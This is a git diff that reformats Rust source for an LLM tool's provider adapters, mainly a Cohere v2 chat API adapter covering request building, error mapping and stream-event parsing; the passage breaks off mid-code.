a/src-rust/crates/api/src/providers/codex.rs +++ b/src-rust/crates/api/src/providers/codex.rs @@ -224,9 +224,10 @@ impl CodexProvider { token: &str, account_id: Option<&str>, ) -> reqwest::RequestBuilder { - let builder = builder - .bearer_auth(token) - .header("User-Agent", concat!("coven-code/", env!("CARGO_PKG_VERSION"))); + let builder = builder.bearer_auth(token).header( + "User-Agent", + concat!("coven-code/", env!("CARGO_PKG_VERSION")), + ); if let Some(id) = account_id { builder.header("ChatGPT-Account-Id", id) @@ -530,7 +531,6 @@ impl CodexProvider { model, }) } - } // --------------------------------------------------------------------------- diff --git a/src-rust/crates/api/src/providers/cohere.rs b/src-rust/crates/api/src/providers/cohere.rs index 88d061e..ada6797 100644 --- a/src-rust/crates/api/src/providers/cohere.rs +++ b/src-rust/crates/api/src/providers/cohere.rs @@ -1,715 +1,722 @@ -// providers/cohere.rs — Cohere provider adapter (Command R / Command R+). -// -// Cohere exposes a custom v2 chat API that is structurally similar to the -// OpenAI Chat Completions wire format but uses its own streaming event -// envelope. This adapter maps the provider-agnostic ProviderRequest / -// ProviderResponse types onto the Cohere v2 wire format and parses the -// streaming JSON objects back into StreamEvents. - -use std::pin::Pin; - -use async_stream::stream; -use async_trait::async_trait; -use claurst_core::provider_id::{ModelId, ProviderId}; -use claurst_core::types::{ContentBlock, UsageInfo}; -use futures::Stream; -use serde_json::{json, Value}; -use tracing::debug; - -use crate::provider::{LlmProvider, ModelInfo}; -use crate::provider_error::ProviderError; -use crate::provider_types::{ - ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, - StreamEvent, SystemPromptStyle, -}; - -// Re-use OpenAI message transformation helpers since Cohere v2 uses the same -// messages array shape (role/content/tool_calls/tool_call_id). -use super::openai::OpenAiProvider; -use super::request_options::merge_root_options; - -// --------------------------------------------------------------------------- -// CohereProvider -// --------------------------------------------------------------------------- - -pub struct CohereProvider { - id: ProviderId, - api_key: String, - http_client: reqwest::Client, -} - -impl CohereProvider { - /// Create a new CohereProvider with the given API key. - pub fn new(api_key: String) -> Self { - let http_client = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(600)) - .build() - .expect("failed to build reqwest client"); - - Self { - id: ProviderId::new(ProviderId::COHERE), - api_key, - http_client, - } - } - - /// Construct from the `COHERE_API_KEY` environment variable. - /// Returns `None` if the variable is absent or empty. - pub fn from_env() -> Option { - std::env::var("COHERE_API_KEY") - .ok() - .filter(|k| !k.is_empty()) - .map(Self::new) - } - - // ----------------------------------------------------------------------- - // Internal helpers - // ----------------------------------------------------------------------- - - /// Build the Cohere v2 messages array from the provider-agnostic request. - /// Cohere v2 uses the same shape as OpenAI Chat Completions, so we reuse - /// the OpenAI transformation helper. - fn build_messages(&self, request: &ProviderRequest) -> Vec { - OpenAiProvider::to_openai_messages_pub( - &request.messages, - request.system_prompt.as_ref(), - ) - } - - /// Build the Cohere v2 tools array. Same shape as OpenAI function tools. - fn build_tools(&self, request: &ProviderRequest) -> Vec { - OpenAiProvider::to_openai_tools_pub(&request.tools) - } - - /// Map an HTTP error response to a typed ProviderError. - fn map_http_error(&self, status: u16, body: &str) -> ProviderError { - // Cohere error format: {"message": "..."} - let message = serde_json::from_str::(body) - .ok() - .and_then(|v| v.get("message").and_then(|m| m.as_str()).map(|s| s.to_string())) - .unwrap_or_else(|| body.to_string()); - - match status { - 401 | 403 => ProviderError::AuthFailed { - provider: self.id.clone(), - message, - }, - 404 => ProviderError::ModelNotFound { - provider: self.id.clone(), - model: message, - suggestions: vec![], - }, - 429 => ProviderError::RateLimited { - provider: self.id.clone(), - retry_after: None, - }, - 400 => ProviderError::InvalidRequest { - provider: self.id.clone(), - message, - }, - _ => ProviderError::ServerError { - provider: self.id.clone(), - status: Some(status), - message, - is_retryable: status >= 500, - }, - } - } - - // ----------------------------------------------------------------------- - // Non-streaming - // ----------------------------------------------------------------------- - - async fn create_message_non_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let messages = self.build_messages(request); - let tools = self.build_tools(request); - - let mut body = json!({ - "model": request.model, - "messages": messages, - "max_tokens": request.max_tokens, - "stream": false, - }); - - if !tools.is_empty() { - body["tools"] = json!(tools); - } - if let Some(t) = request.temperature { - body["temperature"] = json!(t); - } - if let Some(p) = request.top_p { - body["p"] = json!(p); - } - if !request.stop_sequences.is_empty() { - body["stop_sequences"] = json!(request.stop_sequences); - } - merge_root_options(&mut body, &request.provider_options); - - let resp = self - .http_client - .post("https://api.cohere.ai/v2/chat") - .header("Authorization", format!("Bearer {}", self.api_key)) - .header("Content-Type", "application/json") - .json(&body) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - let text = resp.text().await.map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to read response body: {}", e), - status: Some(status), - body: None, - })?; - - if !(200..300).contains(&(status as usize)) { - return Err(self.map_http_error(status, &text)); - } - - let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse response JSON: {}", e), - status: Some(status), - body: Some(text.clone()), - })?; - - // Cohere v2 non-streaming response shape: - // { "id": "...", "message": { "role": "assistant", "content": [...], "tool_calls": [...] }, - // "finish_reason": "COMPLETE", "usage": { "tokens": { "input_tokens": N, "output_tokens": N } } } - let resp_id = json - .get("id") - .and_then(|v| v.as_str()) - .unwrap_or("unknown") - .to_string(); - - let finish_reason = json - .get("finish_reason") - .and_then(|v| v.as_str()) - .unwrap_or("COMPLETE"); - let stop_reason = map_finish_reason(finish_reason); - - let usage = parse_cohere_usage(json.get("usage")); - - let mut content_blocks: Vec = Vec::new(); - - if let Some(message) = json.get("message") { - // Text content - if let Some(content_arr) = message.get("content").and_then(|c| c.as_array()) { - for item in content_arr { - if item.get("type").and_then(|t| t.as_str()) == Some("text") { - if let Some(text) = item.get("text").and_then(|t| t.as_str()) { - content_blocks.push(ContentBlock::Text { text: text.to_string() }); - } - } - } - } - - // Tool calls - if let Some(tool_calls) = message.get("tool_calls").and_then(|t| t.as_array()) { - for tc in tool_calls { - let id = tc.get("id").and_then(|v| v.as_str()).unwrap_or("").to_string(); - let name = tc - .get("function") - .and_then(|f| f.get("name")) - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let input_str = tc - .get("function") - .and_then(|f| f.get("arguments")) - .and_then(|v| v.as_str()) - .unwrap_or("{}"); - let input: Value = - serde_json::from_str(input_str).unwrap_or_else(|_| json!({})); - content_blocks.push(ContentBlock::ToolUse { id, name, input }); - } - } - } - - if content_blocks.is_empty() { - content_blocks.push(ContentBlock::Text { text: String::new() }); - } - - Ok(ProviderResponse { - id: resp_id, - content: content_blocks, - stop_reason, - usage, - model: request.model.clone(), - }) - } - - // ----------------------------------------------------------------------- - // Streaming - // ----------------------------------------------------------------------- - - async fn do_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let messages = self.build_messages(request); - let tools = self.build_tools(request); - - let mut body = json!({ - "model": request.model, - "messages": messages, - "max_tokens": request.max_tokens, - "stream": true, - }); - - if !tools.is_empty() { - body["tools"] = json!(tools); - } - if let Some(t) = request.temperature { - body["temperature"] = json!(t); - } - if let Some(p) = request.top_p { - body["p"] = json!(p); - } - if !request.stop_sequences.is_empty() { - body["stop_sequences"] = json!(request.stop_sequences); - } - merge_root_options(&mut body, &request.provider_options); - - let resp = self - .http_client - .post("https://api.cohere.ai/v2/chat") - .header("Authorization", format!("Bearer {}", self.api_key)) - .header("Content-Type", "application/json") - .json(&body) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - if !(200..300).contains(&(status as usize)) { - let text = resp.text().await.unwrap_or_default(); - return Err(self.map_http_error(status, &text)); - } - - Ok(resp) - } -} - -// --------------------------------------------------------------------------- -// Helpers (module-private) -// --------------------------------------------------------------------------- - -/// Map a Cohere finish_reason string to the provider-agnostic StopReason. -fn map_finish_reason(reason: &str) -> StopReason { - match reason { - "COMPLETE" => StopReason::EndTurn, - "MAX_TOKENS" => StopReason::MaxTokens, - "STOP_SEQUENCE" => StopReason::StopSequence, - "TOOL_CALL" => StopReason::ToolUse, - "ERROR" | "ERROR_TOXIC" | "USER_CANCEL" => { - StopReason::Other(reason.to_string()) - } - other => StopReason::Other(other.to_string()), - } -} - -/// Parse Cohere v2 usage object into the provider-agnostic UsageInfo. -/// -/// Cohere v2 streaming shape: -/// `{"billed_units": {...}, "tokens": {"input_tokens": N, "output_tokens": N}}` -/// -/// Cohere v2 non-streaming shape (inside the response root): -/// `{"billed_units": {...}, "tokens": {"input_tokens": N, "output_tokens": N}}` -fn parse_cohere_usage(usage: Option<&Value>) -> UsageInfo { - let Some(u) = usage else { - return UsageInfo::default(); - }; - - // Try the "tokens" sub-object first (present in both streaming delta and - // the non-streaming response body). - let tokens = u.get("tokens").unwrap_or(u); - - let input = tokens - .get("input_tokens") - .and_then(|v| v.as_u64()) - .unwrap_or(0); - let output = tokens - .get("output_tokens") - .and_then(|v| v.as_u64()) - .unwrap_or(0); - - UsageInfo { - input_tokens: input, - output_tokens: output, - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - } -} - -// --------------------------------------------------------------------------- -// LlmProvider impl -// --------------------------------------------------------------------------- - -#[async_trait] -impl LlmProvider for CohereProvider { - fn id(&self) -> &ProviderId { - &self.id - } - - fn name(&self) -> &str { - "Cohere" - } - - async fn create_message( - &self, - request: ProviderRequest, - ) -> Result { - self.create_message_non_streaming(&request).await - } - - async fn create_message_stream( - &self, - request: ProviderRequest, - ) -> Result> + Send>>, ProviderError> - { - let resp = self.do_streaming(&request).await?; - let provider_id = self.id.clone(); - let model_name = request.model.clone(); - - let s = stream! { - use futures::StreamExt; - - let mut byte_stream = resp.bytes_stream(); - let mut leftover = String::new(); - - let mut message_started = false; - let mut tool_call_buffers: std::collections::HashMap< - usize, - (String, String, String), - > = std::collections::HashMap::new(); - - // Cohere streams newline-delimited JSON objects (not SSE data: lines). - while let Some(chunk_result) = byte_stream.next().await { - let chunk = match chunk_result { - Ok(c) => c, - Err(e) => { - yield Err(ProviderError::StreamError { - provider: provider_id.clone(), - message: format!("Stream read error: {}", e), - partial_response: None, - }); - return; - } - }; - - let text = String::from_utf8_lossy(&chunk); - let combined = if leftover.is_empty() { - text.to_string() - } else { - let mut s = std::mem::take(&mut leftover); - s.push_str(&text); - s - }; - - let mut lines: Vec<&str> = combined.split('\n').collect(); - if !combined.ends_with('\n') { - leftover = lines.pop().unwrap_or("").to_string(); - } - - for line in lines { - let line = line.trim_end_matches('\r').trim(); - if line.is_empty() { - continue; - } - - // Cohere may also send SSE-formatted lines. - let data = if let Some(rest) = line.strip_prefix("data:") { - rest.trim() - } else { - line - }; - - if data == "[DONE]" { - yield Ok(StreamEvent::MessageStop); - return; - } - - let event: Value = match serde_json::from_str(data) { - Ok(v) => v, - Err(e) => { - debug!("Failed to parse Cohere stream chunk: {}: {}", e, data); - continue; - } - }; - - let event_type = event - .get("type") - .and_then(|v| v.as_str()) - .unwrap_or(""); - - match event_type { - "message-start" => { - if !message_started { - let msg_id = event - .get("id") - .and_then(|v| v.as_str()) - .unwrap_or("unknown") - .to_string(); - yield Ok(StreamEvent::MessageStart { - id: msg_id, - model: model_name.clone(), - usage: UsageInfo::default(), - }); - yield Ok(StreamEvent::ContentBlockStart { - index: 0, - content_block: ContentBlock::Text { text: String::new() }, - }); - message_started = true; - } - } - - "content-start" => { - // A new content block is beginning — already handled - // by message-start for text. For tool calls a - // separate tool-call-start event carries the metadata. - } - - "content-delta" => { - // Text delta: - // {"type":"content-delta","index":N,"delta":{"message":{"content":{"type":"text","text":"..."}}}} - if !message_started { - yield Ok(StreamEvent::MessageStart { - id: "unknown".to_string(), - model: model_name.clone(), - usage: UsageInfo::default(), - }); - yield Ok(StreamEvent::ContentBlockStart { - index: 0, - content_block: ContentBlock::Text { text: String::new() }, - }); - message_started = true; - } - - if let Some(text) = event - .get("delta") - .and_then(|d| d.get("message")) - .and_then(|m| m.get("content")) - .and_then(|c| c.get("text")) - .and_then(|t| t.as_str()) - { - if !text.is_empty() { - yield Ok(StreamEvent::TextDelta { - index: 0, - text: text.to_string(), - }); - } - } - } - - "tool-call-start" => { - // {"type":"tool-call-start","index":N,"delta":{"message":{"tool_calls":{"id":"...","function":{"name":"..."}}}}} - if !message_started { - yield Ok(StreamEvent::MessageStart { - id: "unknown".to_string(), - model: model_name.clone(), - usage: UsageInfo::default(), - }); - yield Ok(StreamEvent::ContentBlockStart { - index: 0, - content_block: ContentBlock::Text { text: String::new() }, - }); - message_started = true; - } - - let tc_index = event - .get("index") - .and_then(|v| v.as_u64()) - .unwrap_or(0) as usize; - let block_index = 1 + tc_index; - - if let Some(tc) = event - .get("delta") - .and_then(|d| d.get("message")) - .and_then(|m| m.get("tool_calls")) - { - let tc_id = tc - .get("id") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let tc_name = tc - .get("function") - .and_then(|f| f.get("name")) - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - tool_call_buffers.insert( - block_index, - (tc_id.clone(), tc_name.clone(), String::new()), - ); - yield Ok(StreamEvent::ContentBlockStart { - index: block_index, - content_block: ContentBlock::ToolUse { - id: tc_id, - name: tc_name, - input: json!({}), - }, - }); - } - } - - "tool-call-delta" => { - // {"type":"tool-call-delta","index":N,"delta":{"message":{"tool_calls":{"function":{"arguments":"..."}}}}} - let tc_index = event - .get("index") - .and_then(|v| v.as_u64()) - .unwrap_or(0) as usize; - let block_index = 1 + tc_index; - - if let Some(args_frag) = event - .get("delta") - .and_then(|d| d.get("message")) - .and_then(|m| m.get("tool_calls")) - .and_then(|tc| tc.get("function")) - .and_then(|f| f.get("arguments")) - .and_then(|v| v.as_str()) - { - if !args_frag.is_empty() { - if let Some((_, _, buf)) = - tool_call_buffers.get_mut(&block_index) - { - buf.push_str(args_frag); - } - yield Ok(StreamEvent::InputJsonDelta { - index: block_index, - partial_json: args_frag.to_string(), - }); - } - } - } - - "content-end" | "tool-call-end" => { - // Individual block ended — nothing to emit; handled at - // message-end. - } - - "message-end" => { - // {"type":"message-end","finish_reason":"COMPLETE","delta":{"finish_reason":"COMPLETE","usage":{...}}} - let finish_reason = event - .get("delta") - .and_then(|d| d.get("finish_reason")) - .and_then(|v| v.as_str()) - .or_else(|| { - event.get("finish_reason").and_then(|v| v.as_str()) - }) - .unwrap_or("COMPLETE"); - - let stop_reason = map_finish_reason(finish_reason); - - // Close all open content blocks. - yield Ok(StreamEvent::ContentBlockStop { index: 0 }); - let mut tc_indices: Vec = - tool_call_buffers.keys().cloned().collect(); - tc_indices.sort(); - for idx in tc_indices { - yield Ok(StreamEvent::ContentBlockStop { index: idx }); - } - - let usage = event - .get("delta") - .and_then(|d| d.get("usage")) - .map(|u| parse_cohere_usage(Some(u))); - - yield Ok(StreamEvent::MessageDelta { - stop_reason: Some(stop_reason), - usage, - }); - yield Ok(StreamEvent::MessageStop); - return; - } - - other => { - debug!("Unhandled Cohere stream event type: {}", other); - } - } - } - } - - if message_started { - yield Ok(StreamEvent::MessageStop); - } - }; - - Ok(Box::pin(s)) - } - - async fn list_models(&self) -> Result, ProviderError> { - Ok(vec![ - ModelInfo { - id: ModelId::new("command-r-plus"), - provider_id: self.id.clone(), - name: "Command R+".to_string(), - context_window: 128_000, - max_output_tokens: 4_000, - }, - ModelInfo { - id: ModelId::new("command-r"), - provider_id: self.id.clone(), - name: "Command R".to_string(), - context_window: 128_000, - max_output_tokens: 4_000, - }, - ]) - } - - async fn health_check(&self) -> Result { - if self.api_key.is_empty() { - return Ok(ProviderStatus::Unavailable { - reason: "No API key configured".to_string(), - }); - } - - // Lightweight check: list models endpoint. - let resp = self - .http_client - .get("https://api.cohere.ai/v2/models") - .header("Authorization", format!("Bearer {}", self.api_key)) - .send() - .await; - - match resp { - Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), - Ok(r) => Ok(ProviderStatus::Unavailable { - reason: format!("models endpoint returned {}", r.status()), - }), - Err(e) => Ok(ProviderStatus::Unavailable { - reason: e.to_string(), - }), - } - } - - fn capabilities(&self) -> ProviderCapabilities { - ProviderCapabilities { - streaming: true, - tool_calling: true, - thinking: false, - image_input: false, - pdf_input: false, - audio_input: false, - video_input: false, - caching: false, - structured_output: false, - system_prompt_style: SystemPromptStyle::SystemMessage, - } - } -} +// providers/cohere.rs — Cohere provider adapter (Command R / Command R+). +// +// Cohere exposes a custom v2 chat API that is structurally similar to the +// OpenAI Chat Completions wire format but uses its own streaming event +// envelope. This adapter maps the provider-agnostic ProviderRequest / +// ProviderResponse types onto the Cohere v2 wire format and parses the +// streaming JSON objects back into StreamEvents. + +use std::pin::Pin; + +use async_stream::stream; +use async_trait::async_trait; +use claurst_core::provider_id::{ModelId, ProviderId}; +use claurst_core::types::{ContentBlock, UsageInfo}; +use futures::Stream; +use serde_json::{json, Value}; +use tracing::debug; + +use crate::provider::{LlmProvider, ModelInfo}; +use crate::provider_error::ProviderError; +use crate::provider_types::{ + ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, + StreamEvent, SystemPromptStyle, +}; + +// Re-use OpenAI message transformation helpers since Cohere v2 uses the same +// messages array shape (role/content/tool_calls/tool_call_id). +use super::openai::OpenAiProvider; +use super::request_options::merge_root_options; + +// --------------------------------------------------------------------------- +// CohereProvider +// --------------------------------------------------------------------------- + +pub struct CohereProvider { + id: ProviderId, + api_key: String, + http_client: reqwest::Client, +} + +impl CohereProvider { + /// Create a new CohereProvider with the given API key. + pub fn new(api_key: String) -> Self { + let http_client = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(600)) + .build() + .expect("failed to build reqwest client"); + + Self { + id: ProviderId::new(ProviderId::COHERE), + api_key, + http_client, + } + } + + /// Construct from the `COHERE_API_KEY` environment variable. + /// Returns `None` if the variable is absent or empty. + pub fn from_env() -> Option { + std::env::var("COHERE_API_KEY") + .ok() + .filter(|k| !k.is_empty()) + .map(Self::new) + } + + // ----------------------------------------------------------------------- + // Internal helpers + // ----------------------------------------------------------------------- + + /// Build the Cohere v2 messages array from the provider-agnostic request. + /// Cohere v2 uses the same shape as OpenAI Chat Completions, so we reuse + /// the OpenAI transformation helper. + fn build_messages(&self, request: &ProviderRequest) -> Vec { + OpenAiProvider::to_openai_messages_pub(&request.messages, request.system_prompt.as_ref()) + } + + /// Build the Cohere v2 tools array. Same shape as OpenAI function tools. + fn build_tools(&self, request: &ProviderRequest) -> Vec { + OpenAiProvider::to_openai_tools_pub(&request.tools) + } + + /// Map an HTTP error response to a typed ProviderError. + fn map_http_error(&self, status: u16, body: &str) -> ProviderError { + // Cohere error format: {"message": "..."} + let message = serde_json::from_str::(body) + .ok() + .and_then(|v| { + v.get("message") + .and_then(|m| m.as_str()) + .map(|s| s.to_string()) + }) + .unwrap_or_else(|| body.to_string()); + + match status { + 401 | 403 => ProviderError::AuthFailed { + provider: self.id.clone(), + message, + }, + 404 => ProviderError::ModelNotFound { + provider: self.id.clone(), + model: message, + suggestions: vec![], + }, + 429 => ProviderError::RateLimited { + provider: self.id.clone(), + retry_after: None, + }, + 400 => ProviderError::InvalidRequest { + provider: self.id.clone(), + message, + }, + _ => ProviderError::ServerError { + provider: self.id.clone(), + status: Some(status), + message, + is_retryable: status >= 500, + }, + } + } + + // ----------------------------------------------------------------------- + // Non-streaming + // ----------------------------------------------------------------------- + + async fn create_message_non_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let messages = self.build_messages(request); + let tools = self.build_tools(request); + + let mut body = json!({ + "model": request.model, + "messages": messages, + "max_tokens": request.max_tokens, + "stream": false, + }); + + if !tools.is_empty() { + body["tools"] = json!(tools); + } + if let Some(t) = request.temperature { + body["temperature"] = json!(t); + } + if let Some(p) = request.top_p { + body["p"] = json!(p); + } + if !request.stop_sequences.is_empty() { + body["stop_sequences"] = json!(request.stop_sequences); + } + merge_root_options(&mut body, &request.provider_options); + + let resp = self + .http_client + .post("https://api.cohere.ai/v2/chat") + .header("Authorization", format!("Bearer {}", self.api_key)) + .header("Content-Type", "application/json") + .json(&body) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + let text = resp.text().await.map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to read response body: {}", e), + status: Some(status), + body: None, + })?; + + if !(200..300).contains(&(status as usize)) { + return Err(self.map_http_error(status, &text)); + } + + let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse response JSON: {}", e), + status: Some(status), + body: Some(text.clone()), + })?; + + // Cohere v2 non-streaming response shape: + // { "id": "...", "message": { "role": "assistant", "content": [...], "tool_calls": [...] }, + // "finish_reason": "COMPLETE", "usage": { "tokens": { "input_tokens": N, "output_tokens": N } } } + let resp_id = json + .get("id") + .and_then(|v| v.as_str()) + .unwrap_or("unknown") + .to_string(); + + let finish_reason = json + .get("finish_reason") + .and_then(|v| v.as_str()) + .unwrap_or("COMPLETE"); + let stop_reason = map_finish_reason(finish_reason); + + let usage = parse_cohere_usage(json.get("usage")); + + let mut content_blocks: Vec = Vec::new(); + + if let Some(message) = json.get("message") { + // Text content + if let Some(content_arr) = message.get("content").and_then(|c| c.as_array()) { + for item in content_arr { + if item.get("type").and_then(|t| t.as_str()) == Some("text") { + if let Some(text) = item.get("text").and_then(|t| t.as_str()) { + content_blocks.push(ContentBlock::Text { + text: text.to_string(), + }); + } + } + } + } + + // Tool calls + if let Some(tool_calls) = message.get("tool_calls").and_then(|t| t.as_array()) { + for tc in tool_calls { + let id = tc + .get("id") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let name = tc + .get("function") + .and_then(|f| f.get("name")) + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let input_str = tc + .get("function") + .and_then(|f| f.get("arguments")) + .and_then(|v| v.as_str()) + .unwrap_or("{}"); + let input: Value = + serde_json::from_str(input_str).unwrap_or_else(|_| json!({})); + content_blocks.push(ContentBlock::ToolUse { id, name, input }); + } + } + } + + if content_blocks.is_empty() { + content_blocks.push(ContentBlock::Text { + text: String::new(), + }); + } + + Ok(ProviderResponse { + id: resp_id, + content: content_blocks, + stop_reason, + usage, + model: request.model.clone(), + }) + } + + // ----------------------------------------------------------------------- + // Streaming + // ----------------------------------------------------------------------- + + async fn do_streaming( + &self, + request: &ProviderRequest, + ) -> Result { + let messages = self.build_messages(request); + let tools = self.build_tools(request); + + let mut body = json!({ + "model": request.model, + "messages": messages, + "max_tokens": request.max_tokens, + "stream": true, + }); + + if !tools.is_empty() { + body["tools"] = json!(tools); + } + if let Some(t) = request.temperature { + body["temperature"] = json!(t); + } + if let Some(p) = request.top_p { + body["p"] = json!(p); + } + if !request.stop_sequences.is_empty() { + body["stop_sequences"] = json!(request.stop_sequences); + } + merge_root_options(&mut body, &request.provider_options); + + let resp = self + .http_client + .post("https://api.cohere.ai/v2/chat") + .header("Authorization", format!("Bearer {}", self.api_key)) + .header("Content-Type", "application/json") + .json(&body) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + if !(200..300).contains(&(status as usize)) { + let text = resp.text().await.unwrap_or_default(); + return Err(self.map_http_error(status, &text)); + } + + Ok(resp) + } +} + +// --------------------------------------------------------------------------- +// Helpers (module-private) +// --------------------------------------------------------------------------- + +/// Map a Cohere finish_reason string to the provider-agnostic StopReason. +fn map_finish_reason(reason: &str) -> StopReason { + match reason { + "COMPLETE" => StopReason::EndTurn, + "MAX_TOKENS" => StopReason::MaxTokens, + "STOP_SEQUENCE" => StopReason::StopSequence, + "TOOL_CALL" => StopReason::ToolUse, + "ERROR" | "ERROR_TOXIC" | "USER_CANCEL" => StopReason::Other(reason.to_string()), + other => StopReason::Other(other.to_string()), + } +} + +/// Parse Cohere v2 usage object into the provider-agnostic UsageInfo. +/// +/// Cohere v2 streaming shape: +/// `{"billed_units": {...}, "tokens": {"input_tokens": N, "output_tokens": N}}` +/// +/// Cohere v2 non-streaming shape (inside the response root): +/// `{"billed_units": {...}, "tokens": {"input_tokens": N, "output_tokens": N}}` +fn parse_cohere_usage(usage: Option<&Value>) -> UsageInfo { + let Some(u) = usage else { + return UsageInfo::default(); + }; + + // Try the "tokens" sub-object first (present in both streaming delta and + // the non-streaming response body). + let tokens = u.get("tokens").unwrap_or(u); + + let input = tokens + .get("input_tokens") + .and_then(|v| v.as_u64()) + .unwrap_or(0); + let output = tokens + .get("output_tokens") + .and_then(|v| v.as_u64()) + .unwrap_or(0); + + UsageInfo { + input_tokens: input, + output_tokens: output, + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + } +} + +// --------------------------------------------------------------------------- +// LlmProvider impl +// --------------------------------------------------------------------------- + +#[async_trait] +impl LlmProvider for CohereProvider { + fn id(&self) -> &ProviderId { + &self.id + } + + fn name(&self) -> &str { + "Cohere" + } + + async fn create_message( + &self, + request: ProviderRequest, + ) -> Result { + self.create_message_non_streaming(&request).await + } + + async fn create_message_stream( + &self, + request: ProviderRequest, + ) -> Result> + Send>>, ProviderError> + { + let resp = self.do_streaming(&request).await?; + let provider_id = self.id.clone(); + let model_name = request.model.clone(); + + let s = stream! { + use futures::StreamExt; + + let mut byte_stream = resp.bytes_stream(); + let mut leftover = String::new(); + + let mut message_started = false; + let mut tool_call_buffers: std::collections::HashMap< + usize, + (String, String, String), + > = std::collections::HashMap::new(); + + // Cohere streams newline-delimited JSON objects (not SSE data: lines). + while let Some(chunk_result) = byte_stream.next().await { + let chunk = match chunk_result { + Ok(c) => c, + Err(e) => { + yield Err(ProviderError::StreamError { + provider: provider_id.clone(), + message: format!("Stream read error: {}", e), + partial_response: None, + }); + return; + } + }; + + let text = String::from_utf8_lossy(&chunk); + let combined = if leftover.is_empty() { + text.to_string() + } else { + let mut s = std::mem::take(&mut leftover); + s.push_str(&text); + s + }; + + let mut lines: Vec<&str> = combined.split('\n').collect(); + if !combined.ends_with('\n') { + leftover = lines.pop().unwrap_or("").to_string(); + } + + for line in lines { + let line = line.trim_end_matches('\r').trim(); + if line.is_empty() { + continue; + } + + // Cohere may also send SSE-formatted lines. + let data = if let Some(rest) = line.strip_prefix("data:") { + rest.trim() + } else { + line + }; + + if data == "[DONE]" { + yield Ok(StreamEvent::MessageStop); + return; + } + + let event: Value = match serde_json::from_str(data) { + Ok(v) => v, + Err(e) => { + debug!("Failed to parse Cohere stream chunk: {}: {}", e, data); + continue; + } + }; + + let event_type = event + .get("type") + .and_then(|v| v.as_str()) + .unwrap_or(""); + + match event_type { + "message-start" => { + if !message_started { + let msg_id = event + .get("id") + .and_then(|v| v.as_str()) + .unwrap_or("unknown") + .to_string(); + yield Ok(StreamEvent::MessageStart { + id: msg_id, + model: model_name.clone(), + usage: UsageInfo::default(), + }); + yield Ok(StreamEvent::ContentBlockStart { + index: 0, + content_block: ContentBlock::Text { text: String::new() }, + }); + message_started = true; + } + } + + "content-start" => { + // A new content block is beginning — already handled + // by message-start for text. For tool calls a + // separate tool-call-start event carries the metadata. + } + + "content-delta" => { + // Text delta: + // {"type":"content-delta","index":N,"delta":{"message":{"content":{"type":"text","text":"..."}}}} + if !message_started { + yield Ok(StreamEvent::MessageStart { + id: "unknown".to_string(), + model: model_name.clone(), + usage: UsageInfo::default(), + }); + yield Ok(StreamEvent::ContentBlockStart { + index: 0, + content_block: ContentBlock::Text { text: String::new() }, + }); + message_started = true; + } + + if let Some(text) = event + .get("delta") + .and_then(|d| d.get("message")) + .and_then(|m| m.get("content")) + .and_then(|c| c.get("text")) + .and_then(|t| t.as_str()) + { + if !text.is_empty() { + yield Ok(StreamEvent::TextDelta { + index: 0, + text: text.to_string(), + }); + } + } + } + + "tool-call-start" => { + // {"type":"tool-call-start","index":N,"delta":{"message":{"tool_calls":{"id":"...","function":{"name":"..."}}}}} + if !message_started { + yield Ok(StreamEvent::MessageStart { + id: "unknown".to_string(), + model: model_name.clone(), + usage: UsageInfo::default(), + }); + yield Ok(StreamEvent::ContentBlockStart { + index: 0, + content_block: ContentBlock::Text { text: String::new() }, + }); + message_started = true; + } + + let tc_index = event + .get("index") + .and_then(|v| v.as_u64()) + .unwrap_or(0) as usize; + let block_index = 1 + tc_index; + + if let Some(tc) = event + .get("delta") + .and_then(|d| d.get("message")) + .and_then(|m| m.get("tool_calls")) + { + let tc_id = tc + .get("id") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + let tc_name = tc + .get("function") + .and_then(|f| f.get("name")) + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + tool_call_buffers.insert( + block_index, + (tc_id.clone(), tc_name.clone(), String::new()), + ); + yield Ok(StreamEvent::ContentBlockStart { + index: block_index, + content_block: ContentBlock::ToolUse { + id: tc_id, + name: tc_name, + input: json!({}), + }, + }); + } + } + + "tool-call-delta" => { + // {"type":"tool-call-delta","index":N,"delta":{"message":{"tool_calls":{"function":{"arguments":"..."}}}}} + let tc_index = event + .get("index") + .and_then(|v| v.as_u64()) + .unwrap_or(0) as usize; + let block_index = 1 + tc_index; + + if let Some(args_frag) = event + .get("delta") + .and_then(|d| d.get("message")) + .and_then(|m| m.get("tool_calls")) + .and_then(|tc| tc.get("function")) + .and_then(|f| f.get("arguments")) + .and_then(|v| v.as_str()) + { + if !args_frag.is_empty() { + if let Some((_, _, buf)) = + 